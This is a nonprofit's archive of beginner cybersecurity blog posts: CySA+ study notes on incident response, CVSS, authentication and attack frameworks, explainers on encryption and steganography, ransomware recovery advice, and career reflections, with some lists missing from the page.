Cybersecurity Central | Refining the Human Connection | 501c3 Nonprofit

BLOG BY CC

 Cybersecurity Central is excited to share team insights in Blog by CC.

Bookmark this page and visit each week to learn more about what we are learning, thinking, creating, and discovering in our #infosec journeys.


#cybersecuritycentral #diversityofthought #blogbycc

TABLE OF CONTENTS

FEB 1, 2023

The Containment Phase

by James Driscoll

February 1, 2023

Alright everyone, just eight days 'til my CompTIA CySA+ exam. For this week’s blog, I thought I would talk about the various containment strategies once an incident has been discovered. If you remember from last week, I mentioned the different phases of incident response. Containment is one of those phases.


When we talk about containment, we are talking about restricting the movement of the threat actor to the systems or part of the network they already have access to. This also means not providing a path to the rest of the network. There are four ways in which to restrict that movement, noted below:


 

References

Chapple, M., & Seidl, D. (2020). CompTIA CySA+ Study Guide Exam CSO-002. Indianapolis: John Wiley and Sons: CompTIA CySA+ Exam Study Guide CSO-002


Time for Reflection

by Eula Chua

February 1, 2023

Hello February!

=====

Originally I planned to continue on the topic of encryption algorithms but today’s #BlogByCC happened to fall perfectly on a new start to the month, and to do things differently, I want to take this opportunity to encourage and promote more self-reflection. I noticed throughout the years, I would go months on just zooming through life and end up feeling a little bit lost in between. Just as with studying, if you don’t go back to review what you learned, you’ll end up forgetting it. Similarly with life, if you don’t take the time to reflect on how things are going, how would you know where you’re heading towards is the direction you want to be going?


First of all, happy 1st of February! I can’t believe January flew by just like that. I remember starting off the month feeling a mixture of excitement and nervousness. I started my new IT career at a new workplace, which has been by far amazing and exceeds my expectations. There are moments where I felt a little bit of impostor syndrome but that gets trumped when I realize that I’m in a positive environment surrounded with people who genuinely care for your well-being, growth, and development. I get to say that I am a part of a growing and collaborative team that teaches and supports users on how to effectively use technology to help streamline their workflow. You know you’re making it when work doesn’t feel like work and that everyday is an opportunity to learn new things.


Enough about me and more about you! As we start a new month, new goals, and new aspirations, take a break to sit down and look back on how your January went. Here are some questions that may help you reflect on the past and upcoming month:



On behalf of Cybersecurity Central, we hope you have a wonderful month of February! Let us know how we can support you in your personal development and career growth in the IT/Cybersecurity sector by connecting with us through the Cybersecurity Central LinkedIn Page: https://www.linkedin.com/company/cybersecuritycentralorg


JAN 25, 2023

Symmetric Key Encryption Algorithm

by Eula Chua

January 25, 2023

Last week, we looked into the key differences between symmetric and asymmetric key encryption algorithms. The differences were found within the speed of how they process and secure data, the level of security it provides, the number of keys used to encrypt and decrypt, the length and sizes between the cipher text and plain text, and what they are used for.


This week, we’ll dive deeper into symmetric key encryption and its different types. Symmetric encryption is used to keep data being communicated secure in which only users with authorization can access it. This type of encryption uses the same key to encrypt and decrypt information. Although this keeps things cost-effective and easy to use, it is less secure. This is best used for handling and transferring large amounts of data. There are several types of symmetric key encryption, which are 3DES, DES, AES, RC4, Twofish, and Blowfish. Let’s look at the key points in each one.


3DES (Triple Data Encryption Standard):


DES (Data Encryption Standard):


AES (Advanced Encryption Standard):


RC4 (Rivest Cipher 4):


Twofish:


Blowfish:



References


Phases of Incident Response

by James Driscoll

January 25, 2023

With only two weeks left until my CompTIA CySA+ exam, I am moving right along. This week I will be discussing the Phases of Incident Response, which is Chapter 11 of the CompTIA CySA+ Exam Study Guide CSO-002.


Before I get into the phases of incident response, we must define a couple terms and determine what constitutes a security incident. Those terms are security event, an adverse security event, and a security incident:



Now that is out of the way, we can move onto the phases of incident response. There are four phases to incident response. Preparation; Detection and Analysis; Containment, Eradication, and Recovery; Post-Incident Activity. All of these will be discussed in detail below:



3. Containment, Eradication, and Recovery – After it has been determined an incident has occurred or is occurring, this is where we first limit the damage being caused by limiting the malware’s access to the rest of the network. Once this is accomplished, we move on to removing the malware from the infected systems. After the infected systems have been cleaned up, we can move on to recovery. This is where we get everything back to normal operations.


4. Post Incident Activities – Once everything is back to normal, the incident response is not completely over. There is one final step that is important to accomplish. That step is a lesson learned review. In the military this is called a “Hot Wash”. Basically, what this is, is a formal review where everyone involved get together and go back over the incident noting what went well and what needs to be improved. 


References

Chapple, M., & Seidl, D. (2020). CompTIA CySA+ Study Guide Exam CSO-002. Indianapolis: John Wiley and Sons: CompTIA CySA+ Exam Study Guide CSO-002

JAN 18, 2023

Software Testing

by James Driscoll

January 18 2023

For week 7 of my journey to become CompTIA CySA+ certified I will be looking at software testing. When software is developed, no matter what it is, should be done with security in mind.

One way to ensure that software is secure is through testing. This testing is broken down into two types: 1) static code analysis and 2) dynamic code analysis. Both will be discussed below.

Static code analysis – This is also known as source code analysis. The premises behind this is looking at the source code. So, as you all can guess by the name, with this type of analysis the code is not run. It is simply reviewed either manually or using automated tools. The purpose of it is to understand the logic behind how it is written.

Dynamic code analysis – In this type of analysis, the code is run to see how it responds to various input. It can also be completed either manually or through automated tools. There are six types of testing that can be used in this type of analysis.


References

Chapple, M., & Seidl, D. (2020). CompTIA CySA+ Study Guide Exam CSO-002. Indianapolis: John Wiley and Sons: CompTIA CySA+ Exam Study Guide CSO-002

Symmetric vs. Asymmetric Encryption: Key Differences

by Eula Chua

January 18, 2023

I remember studying for CompTIA Security+ certification a couple of months ago and the topic I had trouble grasping was the difference between symmetric and asymmetric encryption.


First, let’s look at encryption. Encryption is the process of scrambling readable text (plaintext) into a code (ciphertext) to prevent unauthorized parties from accessing it. The only way it can be converted back to plaintext is if the authorized party possesses the decryption key. This is a method of securing sensitive information that gets passed online.


The two main types of encryption are symmetric and asymmetric. The main difference would be the use of keys, which are used to decrypt/unscramble a secret code.


Symmetric key encryption uses one key to encrypt and decrypt a message or data. Although it is at its convenience to have one key making the encryption process fast, it is less secure. It would require the receiving party to share the same key as the sender, which puts data being sent over the network at risk of being uncovered.


Asymmetric key encryption requires two keys, a public key and a private key to encrypt and decrypt a message or data. Compared to symmetric key encryption, it is considered much more secure but a much slower process. The downside to this is that if the private key gets lost, there’s no other way to decrypt the data. Geeks for Geeks created a table of comparison that best describes the differences between the two:


Symmetric Key Encryption


P = D (K, E(P))

where K –> encryption and decryption key

P –> plain text

D –> Decryption

E(P) –> Encryption of plain text


Asymmetric Key Encryption


P = D(Kd, E (Ke,P))

where Ke –> encryption key

Kd –> decryption key

D –> Decryption

E(Ke, P) –> Encryption of plain text using encryption key Ke . P –> plain text


References:


JAN 11, 2023

Authentication Protocols

by James Driscoll

January 11, 2023

Week 6 of my journey to become CompTIA CySA+ certified. For this post I will be covering the various authentication protocols. Authentication is the first part of the AAA, which stands for Authentication, Authorization, and Accounting (AAA). When accessing a network, we must give the network credentials that it can use to prove that we are legitimate users of that system. These credentials are our identity to the network. This is what the network uses to prove or authenticate that we are legitimate users.


Now, there are various protocols that can be used in the authentication process. I will cover the three that are in the CompTIA CySA+ Exam Study Guide CSO-002. They include TACACS+, RADIUS, and Kerberos.


TACACS+ - The Terminal Access Controller Access Control System + (TACACS+) is an expanded service of the original TACACS. One thing to keep in mind about this protocol is that there are a couple of issues with it:


So, what is the compensating control that can be used when changing protocols is not possible? The best practice is to place devices using TACACS+ on its own administrative network that is isolated from everything else.


RADIUS – Remote Authentication Dial-in User Service (RADIUS) the most widely used AAA service. This service is used in client-server networks and runs both TCP and UDP. Passwords are hashed using MD5 while in transit from client to server. So, it is more secure than TACACS+ but there is room for improvement.


Kerberos – This protocol is designed specifically for untrusted networks. All traffic is encrypted. There are three aspects associated with Kerberos:


Something to keep in mind is that Windows Active Directory utilizes Kerberos for authentication.

Until next week!


References

Chapple, M., & Seidl, D. (2020). CompTIA CySA+ Study Guide Exam CSO-002. Indianapolis: John Wiley and Sons: CompTIA CySA+ Exam Study Guide CSO-002


JAN 4, 2023

Happy New Year from Team CC!

by Eula Chua

January 4, 2023

We hope that you have an amazing start of the year. Last year was a year full of discoveries and learning. I took some time to evaluate where I was in my current state and where I wanted to be in my career. There were moments that felt painfully slow, in terms of my personal progress, and moments where I felt like things were moving rapidly. There were moments I took risks, and there were others where I wished I had taken the leap of faith. Nevertheless, I’m grateful to be where I am at this moment and how much I have grown since the start of 2022. Most of my goals came to fruition because of self-reflection. Writing things down and keeping reminders on my calendar kept me away from distractions as best as possible.


This year, I have taken my reflection up a notch and although this is not related to cybersecurity, I wanted to share this resource to everyone because it’s free! This is not a sponsored post, although I vouch for this as many journal prompts included in this resource can either only be found in physical journals and planners, (planners can be costly), or you would have to search up questions on google or formulate your own.


Year Compass provides you all the questions that can help you reflect on your past year and re-evaluate what things and habits you need to keep or leave in the past. This also includes writing prompts to help you plan out your 2023 and make it a memorable one. They give you the option of printing a physical copy or downloading a digital copy that you can upload on your digital notes app. Check out the Year Compass here: https://yearcompass.com


What are your goals for the year of 2023? What certifications are you aiming to achieve? What courses will you be taking? What online communities will you be participating in?


Let’s keep one another accountable! Follow Cybersecurity Central on socials below to stay up-to-date with all the livestream events, online courses, and conferences happening every week!

LinkedInYouTubeTwitter

Security Controls

by James Driscoll

January 4, 2023

Week five of my 10-week journey to becoming CompTIA CySA+ certified, I am halfway through. This week is all about Security Controls. What are security controls? Security controls are implemented to “prevent, detect, counteract, or limit the impact of security risks” (Chapple & Seidl, 2020). These controls are divided into two groups: 1) How they are applied and 2) what the control is designed to accomplish.


Let us look at each group starting with controls based on how they are applied. Now, depending on you we talk to, there are three maybe four controls that fit in here. They include:



Now, we can move on to the controls based on what they are designed to accomplish. There are three in this group:



Finally, there is one more type of control that does not fit into either group. The reason for that is this control is designed to be an alternative when one of the others cannot be used for whatever reason. The name of this control is called a compensating control.


References

Chapple, M., & Seidl, D. (2020). CompTIA CySA+ Study Guide Exam CSO-002. Indianapolis: John Wiley and Sons: CompTIA CySA+ Exam Study Guide CSO-002


DEC 28, 2022

Steganography

by Eula Chua

December 28, 2022

Upon using TryHackMe as a learning platform, I remember learning about steganography for one of the lessons I started with and have not forgotten about it since. So what is steganography?

According to the Merriam-Webster dictionary, Steganography is the “art or practice of concealing a message, image, or file within another message, image or file” that is not so secret. The Greek word, “steganos” or “stegos” means “covered”, while the word “graph” means “to write.” This could look like a secret message or plain text embedded into a picture. To hide a sensitive message within a seemingly “ordinary” file is to avoid detection or suspicion. To elaborate, let’s look at the 5 different types of steganography.


Text Steganography


This method involves storing secret information and encoding it within a text document. Other techniques are called line-shift coding, word-shift coding, feature coding, and syntactic method. Check out Tutorials Point to learn more about these techniques: What are the Techniques of Text Steganography in Information Security?


Audio Steganography


This method is done to conceal messages within audio clips for the purpose of hiding data or by watermarking — to protect the audio from any unauthorized reproduction.


Image Steganography


This method is used to embed data within an image. This can involve altering the intensity values of the image pixels. Other forms of image steganography are as follows:



Video Steganography


This method involves concealing data by embedding it within a video file, which acts as the “carrier”. Discrete Cosine Transform (DCT) is often used as the method. This is done by inserting values in each image within the video file to conceal data.


Network/Protocol Steganography


This method uses network protocols such as TCP, UDP, and more to hide data. Covert channels may be utilized. These are channels that are not used to transfer but rather store information.


The main purpose of steganography is to provide some sort of hidden communication within those who may know how to uncover it. This can be used as an avenue to protect sensitive data from potential malicious attacks. With the constant development of technology, steganography can also be used as a method to deliver attacks. One way is using Powershell or BASH scripting to automate an attack, which can look like embedding and activating scripts within a Word or Excel file once it is opened with the purpose of corruption. It all depends on the motive.


References:

Cloud Responsibilities

by James Driscoll

December 28, 2022

During week four of my 10-week journey to becoming CompTIA CySA+ certified, I will be looking at the responsibilities of the Cloud Service Provider (CSP) and the customer.  So, operating on premises and in a cloud environment have both similarities and differences.  Considerations for Confidentiality, Integrity, and Availability (CIA) must be made in both instances.  Also, access management is an objective in both instances.


Now the difference in on premises and a cloud environment is where responsibilities lie.  You see, on premises operations the owner is responsible for everything.  In a cloud-environment, those responsibilities are split between the CSP, and the customer and those responsibilities differ depending on the type of cloud service (IaaS, PaaS, and SaaS).  Luckily, the CySA+ study guide by CompTIA has a nice graphic that illustrates how those responsibilities are divided up.  I recreated the graphic the graphic below in Excel with the information reviewed in the CompTIA CySA+ Exam Study Guide CSO-002:


The above graphic is divided into three cloud services. Each of those services is divided into five different aspects where responsibilities lie.  One thing you will notice is that everything is color coded.  The white shading depicts what the customer is responsible for, the dark gray depicts what the CSP is responsible for, and the light orange depicts what responsibilities are shared by both the customer and the CSP.


So, what does this mean in terms of Cybersecurity?  Well, at the top of each service is the Data and according to their shading, the customer is responsible for it, even in the SaaS which is shared with the CSP.  That means the customer, aka the owner of the data is responsible for securing it. 


I bring that up because moving to the cloud, while not totally a new concept, is new to some organizations and maybe misunderstood.  I think there maybe the mindset that if an organization moves to the cloud, they are no longer responsible for anything, and that is simply not the case as shown above. 


The key takeaway is, no matter if your organization is considering moving to the cloud, or has already moved, it is important to know where your responsibilities lie.  The inspiration behind this blog is that there have been news stories lately data stored in the cloud have been breached due to misconfigurations and I want to make sure that the cause is not due to a misunderstanding of responsibilities.


References:

DEC 21, 2022

Common Vulnerability Scoring System (CVSS)

by James Driscoll

December 21, 2022

As we continue with week three of this 10-week trek to the CySA+ exam, I will discuss the Common Vulnerability Scoring System (CVSS).  As the name suggests, it is a scoring system for vulnerabilities.  Now, CVSS is part of a larger standardized security information communication platform called the Security Content Automation Protocol (SCAP). 


So, where are we most likely to see CVSS?  Well, when a vulnerability is discovered, it is submitted to the National Vulnerability Database and given a common Vulnerabilities and Exposures (CVE) number.  This CVE is also part of SCAP and maintained by NIST.  Anyway, the CVSS is part of the CVE report, as you can see in the below screenshot.

Upon closer examination, we see that there are two versions of the CVSS.  Version 3 is the most recent version and what is used for newer vulnerabilities.  Older vulnerabilities are scored based on version 2.0.  The next major item to notice is the Base Score which is 7.8 High.  Now, what does this mean?  The CVSS scoring system works on a scale from 0-10 and is broken down into rating categories, shown in the visual below:


So, based on the scale, the 7.8 Base Score is the second highest rating a vulnerability can receive.  That means that any organization with this vulnerability should seriously look at remediating it.


Continuing with our examination of the above CVE, the next item we see is the “Vector”.  This is the actual CVSS and is what determines the base score.  As we can see, the CVSS is broken up into eight categories:



One thing you will notice is that in the above descriptions, I did not give numerical values for each of the criteria.  I left those out for a reason.  That reason is thanks to our friends at NIST, there is an online calculator that will calculate the score for us.  The URL is https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator.  It is easy to use.  For each of the eight categories, click on the criteria that applies.  When checking out the site you will see two metrics: Temporal Score and Environmental Score.  I am not covering them currently as they appear to be outside the scope of the exam per the CompTIA CySA+ Study Guide.


References:


DEC 14, 2022

Starting In IT first? Check Out These Free Resources!

by Eula Chua

December 14, 2022

I have heard this question repeated multiple times (or a similar question just like this), “How can you protect something if you don’t know how it works?”

In a way, this holds true. How do you know what systems to protect? What parts of the networks or systems are vulnerable or at risk if something were to happen?

As someone in pursuit of a career in cybersecurity, I first made the goal to start in an IT role before I continue down the path. As a hands-on learner, I want to learn and understand the ins and outs, the network infrastructures, the vendors used, hardware, software, the issues that end-users may encounter on a daily basis, literally everything within a company. Surely, there are ways to transition into cybersecurity from a completely different industry or right out of graduation and there are wonderful and reputable industry professionals on LinkedIn who speak on this.

However, if you’re someone like me looking to start in IT or review the fundamentals, here are some great free resources I highly recommend:

KevTech IT Support: Kevtech IT Support

Kevin from KevTech IT Support shares valuable information that will help those transitioning into IT prepare for their first job. He shares about how to build your resume, IT FAQs, common IT interview questions, how to build up your own virtual home lab, and many more. He also has a community on Discord.

East Charmer: East Charmer

If you want to know what a day in the life looks like as an IT professional, Marie from East Charmer creates videos to show you on-the-job responsibilities. Not only that, she also creates videos to help those seeking an IT support role and also show a glimpse of what it’s like to work in the office vs working from home, what challenges and difficulties are faced within the role, and best IT practices.

RunCMD (formerly: IT Career Questions): RUN CMD

Zach from RunCMD gives you all the insights into IT, such as knowing which certifications and roadmap to take, which trending skills and topics to dive into, home labs you can start building, and basically everything you need to know to get into IT.

Cobuman: Cobuman

If you want to get super technical, Cobuman is your go-to. Ranging from teaching you how to prepare for your next IT interview or certification to providing tips on help desk issues you may encounter on the job, Cobuman is ready to help you get a head start into your IT career.

NetworkChuck: NetworkChuck

If you want to learn scripting, hacking, and everything tech related, check out Chuck from NetworkChuck on YouTube. He provides fun and informational videos on a lot of different topics like Linux, CCNA, Dockers, Raspberry Pi, Cloud, certifications, and more.

CBT Nuggets: CBT Nuggets

CBT Nuggets is a free IT on-demand training platform. They include courses from industry experts to help you study for your next IT certification or gain real-world IT skills.

Have I missed anything else that should be on this list?

Follow us on Cybersecurity Central on LinkedIn and let us know what else we can add!

Attack Frameworks

by James Driscoll

December 14, 2022

For week two of this 10-week excursion into CompTIA CySA+ I will be discussing the various attack frameworks.  These frameworks are utilized by organizations attempting to predict how an adversary will probably attack their organization.  This allows them to create defenses that are more likely to be effective in the event of an attack. 


According to the CompTIA CySA+ Study Guide, there are four attack frameworks that we should be familiar with.  They are 1) MITRE ATT&CK Framework, 2) The Diamond Model of Intrusion Analysis, 3) Lockheed Martin’s Cyber Kill Chain, and 4) The Unified Kill Chain.  I will go into further detail about each framework in the following paragraphs.


The first framework we will look at is the MITRE ATT&CK Framework.  The MITRE corporation created the ATT&CK (Adversarial Tactics, Techniques, and Common Knowledge) framework as a way for organizations to have access to common descriptions, tactics, techniques, and procedures of known adversaries.  The good thing about this framework is that there is no cost to access it.  To access it, just go to https://attack.mitre.org.  On the first page is the ATT&CK matrix.  There is a plethora of information regarding adversary TTPs available.


The second framework is the Diamond Model of Intrusion Analysis.  The key thing to remember about this is that it is relationship based.  All the vertical lines of the model are called events.  So, the way this works is that analysts try to find as much information as they can by tracing the relationships between the events.

As you can see in the image above, all the vertical lines are events.  Where those lines intersect are core features of the events.  Unfortunately, the study guide really does not go into further detail about this framework.  It is just a basic overview for the test.


The third framework is the Lockheed Martin Cyber Kill Chain.  As the name suggests this framework was created by Lockheed Martin and consists of 7 processes that form a chain:


The fourth and final framework is the Unified Kill Chain.  Now, according to the CompTIA CySA+ Study Guide, while this framework is not testable, it is information that is good to know.  In a nutshell, this framework is a combination of the MITRE ATT&CK Framework, the Lockheed Martin Cyber Kill Chain, and other frameworks.  All together they make up an 18-process chain that describes how an attack can occur both inside and outside a network.


References:


DEC 7, 2022

Risk - Topics from CompTIA CySA+ Studies

by James Driscoll

December 7, 2022

I am currently studying for the CompTIA CySA+ exam, which stands for the CompTIA Cybersecurity Analyst.  Over the next 10 weeks, I will be picking topics from the CompTIA CySA+ Study Guide.  This first blog in the series will cover risk.


The concept of risk is a major player in the world of cybersecurity.  As professionals we constantly talk about our organizations risk acceptance aka risk appetite, but how do we define what a risk is.  To define a risk, we need to discuss two other concepts.  The first concept is vulnerability, which is nothing more than a weakness.  The second concept is a threat, which is any outside force that can exploit a vulnerability.


Now, there are a couple of ways to look at risk.  1) We can look at it as a mathematical equation which looks like “Risk = Threat X Vulnerability”.  Keep in mind that with this type of representation, there no numerical values to be entered.  It is merely a statement that to have a risk, an organization must have both a vulnerability and a threat that can exploit it.  2) Look at it through the lens of a Venn Diagram, below:

What this diagram shows is that risk is where a threat and a vulnerability meet. 


Let us look at each entity starting with threats.  There are four types of threats an organization may encounter.  To determine threats to an organization requires an assessment that focuses outside a particular organization.



Moving on to Vulnerability.  As stated earlier, a vulnerability is nothing more than a weakness that a threat can use to their advantage.  Unlike determining threats, when an organization determines their vulnerabilities, they focus on themselves.


This brings us to risk itself.  There are two concepts that are utilized when determining risk.  They are:


One way to calculate risk is to use a qualitative matrix that utilizes low, medium, and high ratings.  The diagram below is an example out of the CompTIA CySA+ Study Guide:

As you can see, the likelihood a threat will exploit a vulnerability is on the left with the impact on the bottom.  So, this is read just like a graph.  Low values are at the bottom and to the left, with higher values towards the top and to the right.

According to the CySA+ study guide this matrix can also be used as a quantitative matrix.  That means instead of using Low, Medium, and High values, an organization assigns numerical values.  Now, I have not seen quantitative matrix, so I do not know what the maximum numerical value to represent a high value.  I would imagine that would be set by an individual organization. 

References:


CompTIA Network+ vs CCNA?: A Quick Learning Update

by Eula Chua

December 7, 2022

The past few months have been so focused on studying on Security+ that it’s been awhile since I reviewed the fundamentals of networking. This month, I have decided to study and relearn some of the IT networking concepts in order to fully understand what those entering the IT field (or already in the field) will be protecting in the future. I haven’t decided if I want to pursue taking a certification exam and which certification exam to take but I do have the study materials to continue my independent learning. The 2 Network certificates that are highly sought out (industry standard) are CompTIA Network+ and the Cisco Certified Network Associate (CCNA), which will be the focus for today’s blog.


If you are someone who may be thinking about getting a Network certificate (or just studying for it) and can’t decide which one to take, to get you started, I’ll be sharing a few of the main differences and resources that may help you determine which certificate is right for you and meets your needs.


CompTIA Network+:



CCNA:



Resources:



NOV 30, 2022

2022 Reflections

by Eula Chua

November 30, 2022

This blog post will be a bit different than usual.

As you read this, December is literally a day away.

It’s easy to get into the loop of thinking that we haven’t done everything we wanted to do on our list for this year or maybe, we didn’t even have an exact plan to begin with and feel a bit all over the place. That is okay. Things happen and sometimes, the pivots we made may have been necessary.

This year, I took a step forward to dive into the world of cybersecurity. I can tell you for a fact that I had no exact direction to begin with but went in anyway. I took my time researching most of the resources I found and fixed up my LinkedIn profile, which led me to connect with many wonderful cybersecurity communities online.

As long as you take action one step at a time, one thing leads to another and before you know it, you’ve done more than many others who are stuck overthinking which moves to make. If you need somewhere to start, I recommend checking out our Resources page here in Cybersecurity Central.

I invite you to reflect with me and look back on our own journey this year. This way, we can get a sense of where we are, how we got here, and what we are looking forward to in 2023.

Feel free to take some notes and answer the following reflection questions:


For more thought-provoking questions, check out this article by Indeed: 

100 Student Reflection Questions You Can Ask Yourself

I hope these questions help you discover new and amazing things about yourself!

NOV 23, 2022

Ways Organizations Can Recover From an Attack

by James Driscoll

November 23, 2022

In my last blog, I discussed the reasons why organizations should not pay adversaries when they are the victim of a ransomware attack. In this blog, I will discuss things organizations can do to facilitate recovery from an attack.


There are numerous things an organization can do to avoid paying a ransom in the event of an attack. The thing is that these need to be completed before an attack. That means organizations need to change their mindset of “we will not be attacked” to “we will be attacked at some point”. Only then will the following be effective.


One thing that is an absolute must are backups of your data. Now, in the case of backups, there is a generally accepted rule that should be followed. It is called the 3-2-1 backup rule. It breaks down like this. 3 total copies of the data (1 original, 2 copies). Now, the 2 copies need to be saved on two different types of media. The media could be anything if they are different types. Finally, 1 of the copies needs to be stored off site. Cloud storage covers the last two (Elliot, n.d.).


Something else that is a necessity is an Incident Response Plan. A word of advice regarding this, make sure to print out a copy so it can be used in case of an attack. It is useless if it is saved on either a workstation or server that is locked with ransomware. Luckily, our friends at NIST have a special publication that spells most of the elements out. NIST SP 800-61r2 states 8 elements that should be in any Incident Response Plan. Those elements are:



These next few steps are designed to make the organization a hard target. In case some of you are wondering what a hard target is, it is a term the military uses to describe an entity that has a low susceptibility to an attack. The reason I say low susceptibility is that there is no way to get the susceptibility level to zero. If an adversary wants to get onto a network, they will. So, the goal is to make it as difficult as possible, make them waste so much time that simply give up and try to attack another organization. This is accomplished by:



The good thing about taking the above steps is that they help protect against more than just ransomware.


The one thing that I want everyone to take away from this is that we need to ensure our organizations are prepared. I say that because it is 2022 almost 2023 and from what I can tell is that every organization is fair game to ransomware. It is not longer a matter of if an organization is going to become a victim, but rather when will it become a victim. So, by having an Incident Response Plan and testing it, training our users, updating software, and using anti-virus / anti-malware software, our organizations will hopefully not have to struggle with the decision whether to pay a ransom and face a fine from the government because the ransomware group is on the sanctions list or have their data released on the dark web.


References


Thankful for the Tech & InfoSec Community

by Kimberly McKnight

November 23, 2022

It's that time of the year again!  The holidays are approaching.  This week of Thanksgiving, we give thanks  for the people and things that make us feel grateful. 


I felt this was the perfect time to let the entire tech and infosec community know what an important role they have played in not only my life, but also in the lives of many others I have met and grown to know over the past couple of years transitioning into the industry. 


You may hear it all the time, but the community is where it's at.  There are so many communities available within tech and infosec, and that's important.  Each of us come from different backgrounds and experiences and these communities offer us a place to meet, connect, engage, help, support, and learn from each other. 


The important part is to find one, or several, that you feel comfortable in and start showing up.  The more you get intertwined in the community, the more support you will find.  Whether you are employed already, or seeking a new role, being involved in a supportive community is the key to success. Without the connections and relationships you will make, it is a lot harder to network and find a new role. 


Why? The majority of roles are in the "hidden" job market, meaning, they will never be posted.  Those hiring go to the people they know and trust and ask them for recommendations for upcoming (unposted) roles.  If you are not networking or involved in a community, the hidden job market is nearly impossible to tap into. 


Take myself for an example.  I wasn't even applying for roles yet, but I was so involved in one of my favorite infosec communities, simplycyber.io.  My current boss went to Gerald Auger, PhD, and asked him if he knew anyone to recommend for an upcoming role.  Because I was a regular in the community and my skills aligned with the potential role, I was recommended for the role, interviewed, and was hired. 


It can be scary, intimidating, and feel unknown at first, but stick with it, find a community you enjoy being a part of and engage with others within the community.  All of us have something to offer, even if it's support and an encouraging word.  You don't need to be technical to be a part of these communities. 


I may be a little biased, but Simply Cyber is absolutely hands down my favorite community out there.  Thanks to my friend, Stefan Waldvogel for sharing it with me.  Truly a community anyone new, or already in the industry, will appreciate and benefit from being a part of.  If you are into Discord, check out the Simply Cyber Discord, another great place to meet and connect if you can't make the livestreams, or want to connect anytime with the community. 


Again, I truly want to thank everyone who has been a part of my network, and the overarching community.  This journey would not have been possible without you.  I would love to hear, what are some of your favorite communities? 


Let us know on our LinkedIn page, where you can find our posts for these blogs each week: https://www.linkedin.com/company/cybersecuritycentralorg


Happy Thanksgiving! 

NOV 16, 2022

Why Organizations Should Not Pay Ransomware

by James Driscoll

November 16, 2022

We may all remember back in September, the Los Angeles Unified School District becoming a victim of a ransomware attack. A month later, we heard about Medibank, the largest insurance company in Australia, also becoming a victim of a ransomware attack. So, besides both joining the club of ransomware victims, what else do they have in common? Well, both organizations decided not to pay the ransom. In this blog I will discuss some of the reasons why an organization may not want to pay a ransom.


There are three main reasons an organization may not want to pay a ransom:

1) There is no guarantee that the organization will regain access to its information.

2) It almost guarantees that the organization will be attacked again.

3) It may be illegal to pay the ransom.


Let's take a deeper dive into each:

So, how did OFAC obtain jurisdiction to provide policy on ransomware? Well, the International Emergency Economic Powers Act (IEEPA) or the Trading with the Enemy Act (TWEA) delegates jurisdiction to OFAC. Now as part this jurisdiction, they are responsible for not only creating the lists of entities that U.S. citizens cannot conduct transactions with, but also with enforcing those embargoes.

In next week’s blog I will discuss some of the things that organizations can do to protect themselves from becoming a victim of a ransomware attack.

References


Get Ready for the Holidays and Potential Cyber Attacks

by Eula Chua

November 16, 2022

We’re heading into the most wonderful time of the year. While some of us are getting ready for our upcoming Thanksgiving dinners, others are already preparing Christmas presents. Either everything goes smoothly or it doesn’t.


You may ask, “what do the holidays even have to do with cybersecurity?”


Everything.


Think about it. All the retail shops are busy getting ready to stock up for all the holiday sales. We’re busy thinking about what gifts to buy for each of our family members or panicking about what to cook for our upcoming dinner gatherings. Others are getting ready to fly out for vacation. These are some honourable mentions.


While we’re occupied with a million things to do during this season, adversaries are also doing the same.


Have you heard of the Log4J vulnerability, Log4Shell?


Log4J is a built-in software library within Java that was created by an open-source project maintained by the Apache Software Foundation. It logs activities within a web server by tracking and monitoring system calls. The Log4Shell vulnerability was discovered in December 2021, involving arbitrary code execution (ACE). Depending on the Log4J version being used on the application, Log4Shell enables an attacker to remotely control a device on the Internet. This was being done before IT/Cyber professionals discovered it, hence called a zero-day vulnerability.


How about the Cadbury Easter Egg Scam?


Around April 2022, a message with a phishing link was circulating all over WhatsApp, advertising that consumers would receive a free Easter chocolate basket from Cadbury Clicking on the link would take you to a web page where you can fill in your personal data. Eventually, Cadbury found out and issued a public alert.


If you noticed, both situations occurred near or during a holiday. Attackers very well know that people have a lot on their plates during busier seasons like these. By adding more on top of that, they would hope we’d fall into their traps.


How can we prepare for what’s to come? The best way to prevent this is awareness.


We don’t know what we don’t know. Awareness will help lead us to our solution.


Stay on top of the cyber attacks and learn about what occurs during holidays. Here are some great resources (but not limited to) that you can look into (some of these also include examples from the past):


Learn about the social engineering tactics and how attackers use this against us:

Learn how to prevent scams from happening:

Check out the rest of our Blog By CC page below for more cybersecurity topics!


References:

NOV 9, 2022

Resources and Tips to Help You Study for Your CompTIA Security+ Exam

by Eula Chua

November 9, 2022

Leading up to it, I had doubted myself. I didn’t think I was going to pass because my study habits weren’t perfect. But I remembered that I had made a commitment to myself from the beginning of this cybersecurity journey, to pass this exam even if it takes me multiple times to do it.

Last month, I’m happy to share that I finally earned my very first cybersecurity certificate: CompTIA Security+ SY0-601. Passing this exam truly affirmed my decision to begin a career in this field. The learning never stops.

Although everyone has their own way of studying, I want to share with you the resources and tips that have helped me successfully pass this exam. I cannot guarantee that you will pass the exam as what I’m sharing is based on my own experience, however, with the amount of time and work you put in, your success and efforts will show in the results. I hope that what I share helps you in any way.

Resources

The first thing I did was research and find the appropriate study material for Security+ that worked for me. This took some time until I finally decided which courses and practice exams to stick to. There are a lot of free/affordable resources available out there, especially on Youtube and Udemy. It can get overwhelming. Know your learning style and choose accordingly. Check out this page to learn about different learning styles: VAK 

For myself, I learn best by doing all three: learning by seeing/writing, listening, and doing. I made sure to use resources that would aid me in my learning. I chose multiple resources to ensure each topic is fully covered in-depth and explained in different ways to help me understand the concepts. Most of the courses listed include additional hands-on labs that are not a part of the exam but are there to reinforce your learning.

Here are the resources that have helped me:

For visual/auditory learning (learning by seeing/writing and listening):

For kinesthetic learning (learn by doing):

Here are other highly recommended resources that you may also prefer:

Tips

Are you thinking of taking the CompTIA Security+ certification? Let us know how you do on our LinkedIn post: https://www.linkedin.com/company/cybersecuritycentralorg/


Good luck with all your studies!


Check out Resources by CC for even more learning tech and infosec resources!

NOV 2, 2022

Insider Threat

by James Driscoll

November 2, 2022

There is one aspect of cybersecurity that get very little fanfare. That aspect is the insider threat. An insider threat is in my opinion the most dangerous type of cybersecurity attack. I say that because most of the time it involves an employee of an organization which obviously has inside knowledge of the organization and has easier access to the data then an outsider would. Below is a recent case of an insider threat.

